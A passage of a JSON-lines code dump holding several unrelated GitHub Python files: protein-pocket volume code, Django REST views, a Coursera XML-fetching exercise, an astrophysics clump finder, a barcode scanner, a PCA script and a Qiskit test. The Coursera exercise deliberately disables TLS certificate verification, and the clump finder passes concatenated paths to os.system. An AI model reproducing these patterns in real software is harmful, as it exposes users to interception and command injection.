shutil.copyfile(opts.get(\"prot_file\"), new_prot_file)\n opts[\"prot_file\"] = new_prot_file\n\n if opts.get(\"lig_file\") is not None:\n new_lig_file = os.path.join(opts.get(\"output_dir\"), os.path.basename(opts.get(\"lig_file\")))\n shutil.copyfile(opts.get(\"lig_file\"), new_lig_file)\n opts[\"lig_file\"] = new_lig_file\n\n p_s = Spheres(pdb=opts.get(\"prot_file\"), name=\"{0}_prot\".format(opts.get(\"prefix\")))\n logger.debug(\"Protein geometry read from {0}\".format(opts.get(\"prot_file\")))\n\n pl_s = p_s.copy()\n if opts.get(\"lig_file\") is not None:\n l_s = Spheres(pdb=opts.get(\"lig_file\"), r=opts.get(\"lig_incl_rad\"), name=\"{0}_lig_incl\".format(opts.get(\"prefix\")))\n logger.debug(\"Ligand geometry read from {0}\".format(opts.get(\"lig_file\")))\n if opts.get(\"lig_incl_rad\") is not None:\n pl_s = p_s + l_s\n logger.debug(\"Ligand-inclusion radius of {0} applied\".format(opts.get(\"lig_incl_rad\")))\n else:\n l_s = None\n\n pl_s.name = \"{0}_interior\".format(opts.get(\"prefix\"))\n\n pl_bs = pl_s.calculate_surface(probe_radius=opts.get(\"max_rad\"))[0]\n logger.debug(\"Outer bulk-solvent surface calculated\")\n pl_bs.name = \"{0}_boundary\".format(opts.get(\"prefix\"))\n\n pa_s = p_s + pl_bs\n pa_s.name = \"{0}_exterior\".format(opts.get(\"prefix\"))\n if (l_s is not None) and (opts.get(\"lig_excl_rad\") is not None):\n le_s = Spheres(xyz=l_s.xyzr, r=opts.get(\"lig_excl_rad\"), name=\"{0}_lig_excl\".format(opts.get(\"prefix\")))\n le_bs = le_s.calculate_surface(probe_radius=opts.get(\"max_rad\"))[0]\n pa_s = pa_s + le_bs\n logger.debug(\"Ligand-excluded radius of {0} applied\".format(opts.get(\"lig_excl_rad\")))\n\n if opts.get(\"mode\") == \"all\":\n all_pockets = pa_s.calculate_surface(probe_radius=opts.get(\"min_rad\"), all_components=True, min_volume=opts.get(\"min_volume\"))\n for index, pocket in enumerate(all_pockets):\n pocket.name = \"{0}_p{1}\".format(opts.get(\"prefix\"), index)\n logger.info(\"Pockets calculated using mode 'all': {0}\".format(len(all_pockets)))\n if opts.get(\"subdivide\"):\n logger.warning(\"Subpocket clustering not currently supported when calculating all independent pockets\")\n else:\n if opts.get(\"mode\") == \"largest\":\n bp_bs = pa_s.calculate_surface(probe_radius=opts.get(\"min_rad\"), all_components=True, largest_only=True)[0]\n logger.info(\"Largest pocket identified\")\n elif opts.get(\"mode\") == \"specific\":\n if opts.get(\"coordinates\") is not None:\n coordinate = opts.get(\"coordinates\")\n logger.info(\"Specific pocket identified from coordinate: {0}\".format(opts.get(\"coordinates\")))\n elif opts.get(\"resid\") is not None:\n resid = str(opts.get(\"resid\"))\n chain = None\n if not resid[0].isdigit():\n chain = resid[0]\n resid = int(resid[1:])\n else:\n resid = int(resid)\n coordinate = utilities.coordinates_for_resid(opts.get(\"prot_file\"), resid=resid, chain=chain)\n logger.info(\"Specific pocket identified from residue: {0} -> {1} (truncated)\".format(opts.get(\"resid\"), coordinate[0,:]))\n elif l_s is not None:\n lig_coords = l_s.xyz\n coordinate = np.mean(l_s.xyz, axis=0).reshape(1, -1)\n logger.info(\"Specific pocket identified from mean ligand position: {0}\".format(coordinate))\n else:\n logger.error(\"A coordinate, ligand, or residue must be supplied to run in specific mode\")\n return None\n\n p_bs = p_s.calculate_surface(probe_radius=opts.get(\"min_rad\"))[0]\n id_coord = p_bs.nearest_coord_to_external(coordinate).reshape(1, -1)\n bp_bs = pa_s.calculate_surface(probe_radius=opts.get(\"min_rad\"), 
coordinate=id_coord)[0]\n else:\n logger.error(\"Unrecognized mode <{0}>--should be 'all', 'largest', or 'specific'\".format(opts.get(\"mode\")))\n return None\n\n bp_bs.name = \"{0}_p0\".format(opts.get(\"prefix\"))\n\n if bp_bs.mesh.volume > pl_bs.mesh.volume:\n logger.error(\"Binding pocket not correctly identified--try an alternative method to specify the binding pocket\")\n return [], opts\n else:\n all_pockets = [bp_bs]\n\n if opts.get(\"subdivide\"):\n all_pockets.extend(subpockets(bounding_spheres = pa_s, ref_spheres = bp_bs, **opts))\n logger.info(\"Subpockets identified: {0}\".format(len(all_pockets) - 1))\n\n write_report(all_pockets, **opts)\n write_cfg(**opts)\n\n return all_pockets, opts\n\n\ndef pocket_wrapper(**opts):\n \"\"\" wrapper for pocket that configures the logger, sanitizes inputs, and catches errors; useful when running from the command line or PyMOL but split from the core code for programmatic usage\n\n Args:\n opts (dict): dictionary containing all PyVOL options (see pyvol.pymol_interface.pymol_pocket_cmdline for details)\n\n Returns:\n pockets ([Spheres]): a list of Spheres objects each of which contains the geometric information describing a distinct pocket or subpocket\n output_opts (dict): dictionary containing the actual options used in the pocket calculation\n\n \"\"\"\n\n opts = configuration.clean_opts(opts)\n\n utilities.check_dir(opts.get(\"output_dir\"))\n\n log_file = os.path.join(opts.get(\"output_dir\"), \"{0}.log\".format(opts.get(\"prefix\")))\n utilities.configure_logger(filename=log_file, stream_level=opts.get(\"logger_stream_level\"), file_level=opts.get(\"logger_file_level\"))\n logger.debug(\"Logger configured\")\n\n all_pockets, output_opts = pocket(**opts)\n\n return all_pockets, output_opts\n\n\ndef subpockets(bounding_spheres, ref_spheres, **opts):\n \"\"\"\n\n Args:\n bounding_spheres (Spheres): a Spheres object containing both the peptide and solvent exposed face external spheres\n ref_spheres (Spheres): a Spheres object holding the interior spheres that define the pocket to be subdivided\n opts (dict): a dictionary containing all PyVOL options (see pyvol.configuration.clean_opts for details)\n\n Returns:\n grouped_list ([Spheres]): a list of Spheres objects each of which contains the geometric information describing a distinct subpocket\n\n \"\"\"\n\n nonextraneous_rad = opts.get(\"min_rad\") + opts.get(\"max_rad\") + opts.get(\"inclusion_radius_buffer\")\n nonextraneous_spheres = bounding_spheres.identify_nonextraneous(ref_spheres=ref_spheres, radius=nonextraneous_rad)\n\n sampling_radii = np.flip(np.arange(opts.get(\"min_rad\"), opts.get(\"max_subpocket_rad\"), opts.get(\"radial_sampling\")), axis=0)\n unmerged_sphere_lists = utilities.sphere_multiprocessing(nonextraneous_spheres, sampling_radii, all_components=True)\n spheres = cluster.merge_sphere_list(itertools.chain(*unmerged_sphere_lists))\n\n cluster.hierarchically_cluster_spheres(spheres, ordered_radii=sampling_radii, min_new_radius=opts.get(\"min_subpocket_rad\"), min_cluster_size=opts.get(\"min_cluster_size\"), max_clusters=opts.get(\"max_clusters\"))\n\n cluster.remove_overlap(spheres, radii=sampling_radii, spacing=opts.get(\"radial_sampling\"))\n cluster.remove_overlap(spheres)\n cluster.remove_interior(spheres)\n grouped_list = cluster.extract_groups(spheres, surf_radius=opts.get(\"min_subpocket_surf_rad\"), prefix=opts.get(\"prefix\"))\n return grouped_list\n\n\ndef write_cfg(**opts):\n \"\"\" write the processed configuration to file\n\n Args:\n output_dir (str): 
output directory, relative or absolute\n prefix (str): identifying prefix for the output files\n\n \"\"\"\n\n utilities.check_dir(opts.get(\"output_dir\"))\n configuration.opts_to_file(opts)\n\n\ndef write_report(all_pockets, **opts):\n \"\"\" Write a brief report of calculated volumes to file\n\n Args:\n all_pockets ([Spheres]): a list of Spheres objects each of which contains the complete information about a distinct pocket or subpocket\n output_dir (str): output directory, relative or absolute\n prefix (str): identifying prefix for output files\n\n \"\"\"\n import os\n import pandas as pd\n\n utilities.check_dir(opts.get(\"output_dir\"))\n\n rept_list = []\n\n for pocket in all_pockets:\n spheres_name = os.path.join(opts.get(\"output_dir\"), \"{0}.xyzrg\".format(pocket.name))\n pocket.write(spheres_name)\n rept_list.append({\"name\": pocket.name,\n \"volume\": pocket.mesh.volume\n })\n rept_df = pd.DataFrame(rept_list)\n rept_name = os.path.join(opts.get(\"output_dir\"), \"{0}.rept\".format(opts.get(\"prefix\")))\n rept_df.to_csv(rept_name, index=False)\n logger.info(\"Report written to: {0}\".format(rept_name))\n","repo_name":"schlessinger-lab/pyvol","sub_path":"pyvol/identify.py","file_name":"identify.py","file_ext":"py","file_size_in_byte":11191,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"66"} +{"seq_id":"2952679","text":"import datetime\n\nfrom rest_framework import status, request\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework.utils import json\n\nfrom JolgorioWebApp.models import Actividad, Usuario, Logro, Material, UsuarioHasActividad\nfrom JolgorioWebApp.serializers import ActividadSerializer, UsuarioSerializer, LogroSerializer, MaterialSerializer\n\n@api_view(['GET'])\ndef listar_actividades(request):\n if request.method == 'GET':\n actividades = Actividad.objects.filter(estado=1).order_by('tipo')\n serializer = ActividadSerializer(actividades, many=True)\n return Response(serializer.data)\n\n@api_view(['GET'])\ndef listar_materiales(request, id):\n if request.method == 'GET':\n materiales = Material.objects.filter(actividadhasmaterial__actividad_idactividad=id)\n serializer = MaterialSerializer(materiales, many=True)\n return Response(serializer.data)\n\n@api_view(['GET'])\ndef listar_actividades_completadas(request, id):\n if request.method == 'GET':\n actividades = Actividad.objects.filter(usuariohasactividad__usuario_idusuario=id)\n serializer = ActividadSerializer(actividades, many=True)\n return Response(serializer.data)\n\n@api_view(['GET'])\ndef listar_actividades_ultimo_mes(request, id):\n if request.method == 'GET':\n actividades = Actividad.objects.filter(usuariohasactividad__usuario_idusuario= id,\n usuariohasactividad__fechacompletado__month=datetime.date.today().month,\n usuariohasactividad__fechacompletado__year=datetime.date.today().year)\n serializer = ActividadSerializer(actividades, many=True)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef usuario_por_id(request, id):\n if request.method == 'GET':\n usuario = Usuario.objects.get(idusuario=id);\n serializer = UsuarioSerializer(usuario, many=False)\n return Response(serializer.data)\n\n\n\n@api_view(['GET'])\ndef usuario_por_telefono(request, numero):\n if request.method == 'GET':\n usuario = Usuario.objects.get(numero=numero);\n serializer = UsuarioSerializer(usuario, many=False)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef usuario_por_correo(request, 
correo):\n if request.method == 'GET':\n usuario = Usuario.objects.get(email=correo);\n serializer = UsuarioSerializer(usuario, many=False)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef listar_logros(request, tipo):\n if request.method == 'GET':\n logros = Logro.objects.filter(tipo=tipo)\n serializer = LogroSerializer(logros, many=True)\n return Response(serializer.data)\n\n@api_view(['POST'])\ndef actividad_completada(request):\n if request.method == 'POST':\n json_data = json.loads(request.body)\n idusuario = json_data[\"idusuario\"]\n idactividad = json_data[\"idactividad\"]\n fecha = datetime.date.today()\n query = UsuarioHasActividad(idusuario, idactividad, fecha)\n query.save()\n response = {\"status\": \"success\"}\n return Response(response)\n\n","repo_name":"joseaoviedo/JolgorioWeb","sub_path":"JolgorioWebApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3175,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"7001716671","text":"\"\"\" Assignment 13.1. of Coursera Python Web Access \"\"\"\n\n\nimport urllib.request\nimport urllib.parse\nimport urllib.error\nimport sys\nimport ssl\nimport xml.etree.ElementTree as ET\n\n\ndef main():\n \"\"\" Main method \"\"\"\n try:\n ctx = ssl.create_default_context()\n ctx.check_hostname = False\n ctx.verify_mode = ssl.CERT_NONE\n\n url = input(\"Enter url:\")\n print(\"Retrieving:\", url)\n xmldata = urllib.request.urlopen(url, context=ctx).read()\n tree = ET.fromstring(xmldata)\n counts = tree.findall('.//count')\n sum_of_counts = 0\n for count in counts:\n sum_of_counts = sum_of_counts + int(count.text)\n print(sum_of_counts)\n except:\n print(sys.exc_info())\n\n\nmain()\n","repo_name":"pramodrao/PyLabs","sub_path":"Coursera_Python_Access_Web_Data/assignment_13_1.py","file_name":"assignment_13_1.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"12530914831","text":"import yt\nfrom yt.data_objects.level_sets.api import *\nfrom foggie.utils.foggie_load import foggie_load as fl\nfrom foggie.utils.foggie_load import load_sim\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom foggie.utils.get_run_loc_etc import get_run_loc_etc\nimport argparse\nimport trident\n\ndef parse_args():\n '''Parse command line arguments. Returns args object.\n NOTE: Need to move command-line argument parsing to separate file.'''\n\n parser = argparse.ArgumentParser()\n # Optional arguments:\n parser.add_argument('--halo', metavar='halo', type=str, action='store', \\\n help='Which halo? Default is 8508 (Tempest)')\n parser.set_defaults(halo='8508')\n\n parser.add_argument('--run', metavar='run', type=str, action='store', \\\n help='Which run? Default is nref11c_nref9f. Alternative: nref11n_nref10f')\n parser.set_defaults(run='nref11c_nref9f')\n\n parser.add_argument('--output', metavar='output', type=str, action='store', \\\n help='Which output? Default is RD0027 = redshift 1')\n parser.set_defaults(output='RD0027')\n\n parser.add_argument('--system', metavar='system', type=str, action='store', \\\n help='Which system are you on? Default is ramona_pleiades')\n parser.set_defaults(system='ramona_pleiades')\n\n parser.add_argument('--pwd', dest='pwd', action='store_true', \\\n help='Just use the working directory? 
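# --pwd is a store_true flag: False by default (set below), True when passed\n    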
Default is no')\n parser.set_defaults(pwd=False)\n\n parser.add_argument('--width', metavar='width', type=float, action='store', \\\n help='Width of the box around the halo center in kpc. default = 30')\n parser.set_defaults(width=30.)\n\n parser.add_argument('--step', metavar='step', type=float, action='store', \\\n help='clumpfinder step parameter. default = 2. ')\n parser.set_defaults(step=2.)\n\n parser.add_argument('--patchname', metavar='patchname', type=str, action='store', \\\n help='Name for the patch to find clumps? Default is central_30kpc')\n parser.set_defaults(patchname='box1')\n\n parser.add_argument('--center', metavar='center', type=str, action='store', \\\n help='Center of the box in the halo center in code units. default = center1')\n parser.set_defaults(center='center1')\n\n args = parser.parse_args()\n return args\n\nargs = parse_args()\nfoggie_dir, output_dir, run_loc, code_path, trackname, haloname, spectra_dir, infofile = get_run_loc_etc(args)\npatchname = args.patchname\noutput_dir = output_dir+\"clumps/\"+patchname+'/'\nif not (os.path.exists(output_dir)): os.system('mkdir -p ' + output_dir)\nos.chdir(output_dir)\nhalo = args.halo\nsim = args.run\nsnap = args.output\n\nfilename = foggie_dir+'halo_00'+halo+'/'+sim+'/'+snap+'/'+snap\ntrack_name = trackname\n\n#ds, region = fl(filename,trackname)\nds, region = fl(filename, trackname, \\\n particle_type_for_angmom=False, do_filter_particles=False, \\\n region='refine_box') # this *SHOULD* work better, I just hope I'm not losing anything important\n# if halo_c_v file does not include the halo center, foggie_load will try to calculate it (which doesnt work without problems in yt4 so here is the workaround from Ayan using load_sim)\n\n\n#ds, refine_box = load_sim(args, region='refine_box')\n#args.halo_center = ds.halo_center_kpc\n#args.halo_velocity = ds.halo_velocity_kms\n#[centerx,centery,centerz] = ds.halo_center\n#args.halo_velocity = ds.halo_velocity_kms\n\n\n\nfor chosenion in ['O VI','C II','C IV','Si II','Si III','Si IV', 'Mg I', 'Mg II', 'H I']:\n trident.add_ion_fields(ds, ions=[chosenion])\n\nchosenwidth = args.width\n\ndx= ds.quan(chosenwidth,'kpc').in_units('code_length')\n\ndy= ds.quan(chosenwidth,'kpc').in_units('code_length')\n\ndz= ds.quan(chosenwidth,'kpc').in_units('code_length')\n\n\n[centerx,centery,centerz]=region.center\n\ncenter1 = [centerx+dx,centery,centerz]\ncenter2 = [centerx+dx,centery+dy,centerz]\ncenter3 = [centerx+dx,centery+dy,centerz+dz]\ncenter4 = [centerx+dx,centery+dy,centerz-dz]\ncenter5 = [centerx+dx,centery,centerz+dz]\ncenter6 = [centerx+dx,centery,centerz-dz]\ncenter7 = [centerx+dx,centery-dy,centerz]\ncenter8 = [centerx+dx,centery-dy,centerz+dz]\ncenter9 = [centerx+dx,centery-dy,centerz-dz]\ncenter10 = [centerx,centery,centerz]\ncenter11 = [centerx,centery+dy,centerz]\ncenter12 = [centerx,centery+dy,centerz+dz]\ncenter13 = [centerx,centery+dy,centerz-dz]\ncenter14 = [centerx,centery,centerz+dz]\ncenter15 = [centerx,centery,centerz-dz]\ncenter16 = [centerx,centery-dy,centerz]\ncenter17 = [centerx,centery-dy,centerz+dz]\ncenter18 = [centerx,centery-dy,centerz-dz]\ncenter19 = [centerx-dx,centery,centerz]\ncenter20 = [centerx-dx,centery+dy,centerz]\ncenter21 = [centerx-dx,centery+dy,centerz+dz]\ncenter22 = [centerx-dx,centery+dy,centerz-dz]\ncenter23 = [centerx-dx,centery,centerz+dz]\ncenter24 = [centerx-dx,centery,centerz-dz]\ncenter25 = [centerx-dx,centery-dy,centerz]\ncenter26 = [centerx-dx,centery-dy,centerz+dz]\ncenter27 = [centerx-dx,centery-dy,centerz-dz]\n\n\nif args.center 
== 'center1':\n chosencenter = center1\nif args.center == 'center2':\n chosencenter = center2\nif args.center == 'center3':\n chosencenter = center3\nif args.center == 'center4':\n chosencenter = center4\nif args.center == 'center5':\n chosencenter = center5\nif args.center == 'center6':\n chosencenter = center6\nif args.center == 'center7':\n chosencenter = center7\nif args.center == 'center8':\n chosencenter = center8\nif args.center == 'center9':\n chosencenter = center9\nif args.center == 'center10':\n chosencenter = center10\nif args.center == 'center11':\n chosencenter = center11\nif args.center == 'center12':\n chosencenter = center12\nif args.center == 'center13':\n chosencenter = center13\nif args.center == 'center14':\n chosencenter = center14\nif args.center == 'center15':\n chosencenter = center15\nif args.center == 'center16':\n chosencenter = center16\nif args.center == 'center17':\n chosencenter = center17\nif args.center == 'center18':\n chosencenter = center18\nif args.center == 'center19':\n chosencenter = center19\nif args.center == 'center20':\n chosencenter = center20\nif args.center == 'center21':\n chosencenter = center21\nif args.center == 'center22':\n chosencenter = center22\nif args.center == 'center23':\n chosencenter = center23\nif args.center == 'center24':\n chosencenter = center24\nif args.center == 'center25':\n chosencenter = center25\nif args.center == 'center26':\n chosencenter = center26\nif args.center == 'center27':\n chosencenter = center27\n\n#print(center)\ndata_source = ds.sphere(chosencenter, (chosenwidth, 'kpc'))\n\n#yt.ProjectionPlot(ds, 2, (\"gas\", \"density\"), center=chosencenter, width=(chosenwidth,'kpc'),data_source=data_source, weight_field=(\"gas\", \"density\")).show()\n\n#yt.ProjectionPlot(ds, 2, (\"gas\", \"temperature\"), center=chosencenter, width=(chosenwidth,'kpc'),data_source=data_source, weight_field=(\"gas\", \"density\")).show()\n\n#yt.ProjectionPlot(ds, 2, (\"gas\", \"metallicity\"), center=chosencenter, width=(chosenwidth,'kpc'),data_source=data_source, weight_field=(\"gas\", \"density\")).show()\n\n\nmaster_clump = Clump(data_source, (\"gas\", \"density\"))\nmaster_clump.add_validator(\"min_cells\", 20)\nc_min = data_source[\"gas\", \"density\"].min()\nc_max = data_source[\"gas\", \"density\"].max()\nstep = args.step #100. 
#2.0\nfind_clumps(master_clump, c_min, c_max, step)\n\nleaf_clumps = master_clump.leaves\nprj = yt.ProjectionPlot(ds, 0, (\"gas\", \"density\"),\n # center=chosencenter, width=(chosenwidth,'kpc'),weight_field=(\"gas\", \"density\"), data_source=data_source)\n center=chosencenter, width=(chosenwidth,'kpc'), data_source=data_source)\n\nprj.annotate_clumps(leaf_clumps)\nplotsdir = output_dir +'plots'\nif not (os.path.exists(plotsdir)): os.system('mkdir -p ' + plotsdir)\nprj.save(plotsdir+'/halo_00'+halo+'_'+sim+'_'+snap+'_'+snap+'_clumps_density.png')\n#prj.show()\n\nmaster_clump.add_info_item(\"total_cells\")\nmaster_clump.add_info_item(\"cell_mass\")\nmaster_clump.add_info_item(\"mass_weighted_jeans_mass\")\nmaster_clump.add_info_item(\"volume_weighted_jeans_mass\")\nmaster_clump.add_info_item(\"max_grid_level\")\nmaster_clump.add_info_item(\"min_number_density\")\nmaster_clump.add_info_item(\"max_number_density\")\nmaster_clump.add_info_item(\"center_of_mass\")\nmaster_clump.add_info_item(\"distance_to_main_clump\")\n\n\n\nfields_of_interest = [(\"gas\", \"density\"),(\"gas\", \"temperature\"), (\"gas\", \"metallicity\"),\"particle_mass\",'particle_position',(\"gas\", 'cell_mass'),(\"gas\", \"cell_volume\"), \\\n (\"gas\", 'radial_velocity_corrected'), \\\n (\"gas\", 'Si_p1_number_density'), (\"gas\", 'Si_p2_number_density'), (\"gas\", 'Si_p3_number_density'), (\"gas\", 'C_p1_number_density'), (\"gas\", 'C_p3_number_density'), (\"gas\", 'O_p5_number_density'), (\"gas\", 'Mg_p0_number_density'),(\"gas\", 'Mg_p1_number_density'),(\"gas\", 'H_p0_number_density'), \\\n (\"gas\", 'Si_p1_mass'), (\"gas\", 'Si_p2_mass'), (\"gas\", 'Si_p3_mass'), (\"gas\", 'C_p1_mass'), (\"gas\", 'C_p3_mass'), (\"gas\", 'O_p5_mass'), (\"gas\", 'Mg_p0_mass'),(\"gas\", 'Mg_p1_mass'),(\"gas\", 'H_p0_mass') \\\n ]\n\n\nfn = master_clump.save_as_dataset(filename='halo_00'+halo+'_'+sim+'_'+snap+'_'+snap+'_clumps_tree',fields=fields_of_interest)\nleaf_clumps = master_clump.leaves\n\nindclumpdir = output_dir +'individual_clumps'\nif not (os.path.exists(indclumpdir)): os.system('mkdir -p ' + indclumpdir)\nfor clump in leaf_clumps:\n clumpfn=str(clump.clump_id)+'_single_clump'\n #clump.save_as_dataset(filename=clumpfn,fields=[\"density\", \"particle_mass\",'particle_position'])\n clump.data.save_as_dataset(filename=indclumpdir+'/'+clumpfn,fields=fields_of_interest)\n\n\nfilename = 'halo_00'+halo+'_'+sim+'_'+snap+'_'+snap+'_clumps_cut_region'\nmaster_clump.data.save_as_dataset(filename=filename,fields=fields_of_interest)\n\n\"\"\"\nclumpmasses = []\nclumpvolumes = []\nfailedclumps = []\nfor i in range(100):\n i=i+1\n clumpfile=str(i)+\"_single_clump.h5\"\n if (os.path.exists(clumpfile)):\n clump1 = yt.load(clumpfile)\n ad = clump1.all_data()\n try:\n clumpmass = ad[\"gas\", \"cell_mass\"].sum().in_units(\"Msun\")\n clumpvolume = ad[\"gas\", \"cell_volume\"].sum().in_units(\"kpc**3\")\n print(i)\n print(clumpmass)\n print(clumpvolume)\n clumpmasses.append(clumpmass)\n clumpvolumes.append(clumpvolume)\n\n except ValueError:\n failedclumps.append(i)\n pass\n\nprint('Failed clumps: ')\nprint(failedclumps)\n\nclumpmasses=np.array(clumpmasses)\nclumpvolumes=np.array(clumpvolumes)\n\n\nplt.figure()\nplt.hist(clumpvolumes)\nplt.savefig('clumpvolumes.png')\n\nplt.figure()\nplt.hist(clumpmasses)\nplt.savefig('clumpmasses.png')\n\n\nclumpradii = (3/4/np.pi * 
clumpvolumes)**(1/3)\n\nplt.figure()\nplt.hist(clumpradii)\nplt.savefig('clumpradii.png')\n\"\"\"\n","repo_name":"foggie-sims/foggie","sub_path":"foggie/clumps/full_run.py","file_name":"full_run.py","file_ext":"py","file_size_in_byte":10981,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"} +{"seq_id":"5522197702","text":"import cv2\r\nfrom pyzbar import pyzbar\r\nimport winsound\r\nfrom tkinter import messagebox\r\nclass Test(object):\r\n def __init__(self, bc):\r\n self.bc = bc\r\n def setBc(self, bc):\r\n self.bc = bc\r\n return\r\n def getBc(self):\r\n return self.bc\r\n def cutBc(self, bc):\r\n bc = str(bc)\r\n s = []\r\n z = \"\"\r\n for i in range(len(bc)):\r\n s.append(bc[i])\r\n s.pop(0)\r\n s.pop(0)\r\n for i in range(len(s)):\r\n z += str(s[i])\r\n print (z)\r\n return z\r\n \r\n \r\n \r\n \r\nbc = Test(0000000000)\r\n \r\ndef check(barcode):\r\n fpRef = open(\"planoguide.txt\", \"r\")\r\n x = 0\r\n while True:\r\n line = fpRef.readline()\r\n if line == \"\":\r\n fpRef.close()\r\n if x == 0:\r\n messagebox.showinfo(title = \"Error\", message = \"Item not found!\")\r\n fpRef.close()\r\n break\r\n line = line.strip()\r\n word = line.split()\r\n if barcode == word[0]:\r\n messagebox.showinfo(title = (word[4]), message = (word[2], \"Row\", word[3], \"Item\"))\r\n x += 1\r\n fpRef.close()\r\n break\r\n return\r\ndef read_barcodes(frame):\r\n barcodes = pyzbar.decode(frame) \r\n for barcode in barcodes:\r\n barcode_info = barcode.data.decode('utf-8')\r\n #print(barcode_info)\r\n bc.setBc(barcode_info)\r\n #print(bc.getBc(), \"a\")\r\n \r\n #winsound.PlaySound(\"sound2.wav\", winsound.SND_ASYNC)\r\n return frame\r\ndef main():\r\n camera = cv2.VideoCapture(0)\r\n ret, frame = camera.read()\r\n while ret:\r\n print(pyzbar.decode(frame))\r\n ret, frame = camera.read()\r\n frame = read_barcodes(frame)\r\n cv2.imshow('Big Lots Box Finder', frame)\r\n if pyzbar.decode(frame) != []:\r\n print(bc.getBc())\r\n break\r\n if cv2.waitKey(1) & 0xFF == 27:\r\n exit()\r\n break\r\n camera.release()\r\n cv2.destroyAllWindows()\r\n w = bc.getBc()\r\n x = bc.cutBc(w)\r\n bc.setBc(x)\r\n check(bc.getBc())\r\nwhile True:\r\n main()\r\n\r\n\r\n\r\n","repo_name":"drouckama/Retail-Store-Item-Locater","sub_path":"finder.py","file_name":"finder.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40032950282","text":"import pandas as pd\r\nimport numpy as np\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nimport plotly.express as px\r\n\r\ndata = pd.read_csv('properties.csv')\r\ndata = data.drop(labels=[\"hu5\", \"hu6\"], axis=\"columns\")\r\ndata.head()\r\n\r\n\r\ndata = MinMaxScaler().fit_transform(data)\r\npca = PCA(n_components=3)\r\npca.fit(data)\r\n\r\ndata_pca = pca.transform(data).T\r\nprint(pca.explained_variance_)\r\nprint(pca.explained_variance_ratio_)\r\n\r\n\r\n#https://plotly.com/python/pca-visualization/\r\npca = PCA(3)\r\ncomponents = pca.fit_transform(data)\r\nlabels = {\r\n str(i): f\"PC {i+1} ({var:.1f}%)\"\r\n for i, var in enumerate(pca.explained_variance_ratio_ * 100)\r\n}\r\n\r\nfig = px.scatter_matrix(\r\n components,\r\n labels=labels,\r\n dimensions=range(3)\r\n #,color = 
data_pca[0]\r\n)\r\nfig.update_traces(diagonal_visible=False)\r\nfig.show()","repo_name":"JPEspinoza/tarea_3_imagenes","sub_path":"pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15357332728","text":"import unittest\nimport warnings\nfrom test.aqua import QiskitAquaTestCase\nfrom ddt import ddt, data\n\nfrom qiskit import BasicAer\nfrom qiskit.circuit.library import TwoLocal\n\nfrom qiskit.aqua import QuantumInstance, aqua_globals\nfrom qiskit.aqua.operators import I, X, Z\nfrom qiskit.aqua.utils import decimal_to_binary\nfrom qiskit.aqua.components.initial_states import VarFormBased\nfrom qiskit.aqua.components.optimizers import SPSA\nfrom qiskit.aqua.algorithms import VQE\nfrom qiskit.aqua.algorithms import IQPE\n\n\n@ddt\nclass TestVQE2IQPE(QiskitAquaTestCase):\n \"\"\" Test VQE to IQPE \"\"\"\n\n def setUp(self):\n super().setUp()\n self.seed = 20798\n aqua_globals.random_seed = self.seed\n self.qubit_op = -1.052373245772859 * (I ^ I) \\\n + 0.39793742484318045 * (I ^ Z) \\\n - 0.39793742484318045 * (Z ^ I) \\\n - 0.01128010425623538 * (Z ^ Z) \\\n + 0.18093119978423156 * (X ^ X)\n\n @data('initial_state', 'circuit')\n def test_vqe_2_iqpe(self, mode):\n \"\"\" vqe to iqpe test \"\"\"\n backend = BasicAer.get_backend('qasm_simulator')\n num_qbits = self.qubit_op.num_qubits\n wavefunction = TwoLocal(num_qbits, ['ry', 'rz'], 'cz', reps=3)\n\n optimizer = SPSA(maxiter=10)\n algo = VQE(self.qubit_op, wavefunction, optimizer)\n\n quantum_instance = QuantumInstance(backend, seed_simulator=self.seed,\n seed_transpiler=self.seed)\n result = algo.run(quantum_instance)\n\n self.log.debug('VQE result: %s.', result)\n\n ref_eigenval = -1.85727503 # Known reference value\n\n num_time_slices = 1\n num_iterations = 6\n\n param_dict = result.optimal_parameters\n if mode == 'initial_state':\n with warnings.catch_warnings():\n warnings.filterwarnings('ignore', category=DeprecationWarning)\n state_in = VarFormBased(wavefunction, param_dict)\n else:\n state_in = wavefunction.assign_parameters(param_dict)\n\n iqpe = IQPE(self.qubit_op, state_in, num_time_slices, num_iterations,\n expansion_mode='suzuki', expansion_order=2,\n shallow_circuit_concat=True)\n quantum_instance = QuantumInstance(\n backend, shots=100, seed_transpiler=self.seed, seed_simulator=self.seed\n )\n result = iqpe.run(quantum_instance)\n\n self.log.debug('top result str label: %s', result.top_measurement_label)\n self.log.debug('top result in decimal: %s', result.top_measurement_decimal)\n self.log.debug('stretch: %s', result.stretch)\n self.log.debug('translation: %s', result.translation)\n self.log.debug('final eigenvalue from QPE: %s', result.eigenvalue)\n self.log.debug('reference eigenvalue: %s', ref_eigenval)\n self.log.debug('ref eigenvalue (transformed): %s',\n (ref_eigenval + result.translation) * result.stretch)\n self.log.debug('reference binary str label: %s', decimal_to_binary(\n (ref_eigenval.real + result.translation) * result.stretch,\n max_num_digits=num_iterations + 3,\n fractional_part_only=True\n ))\n\n self.assertAlmostEqual(result.eigenvalue.real, ref_eigenval.real, delta=1e-2)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"qiskit-community/qiskit-aqua","sub_path":"test/aqua/test_vqe2iqpe.py","file_name":"test_vqe2iqpe.py","file_ext":"py","file_size_in_byte":3410,"program_lang":"python","lang":"en","doc_type":"code","stars":564,"dataset":"github-code","pt":"66"} 
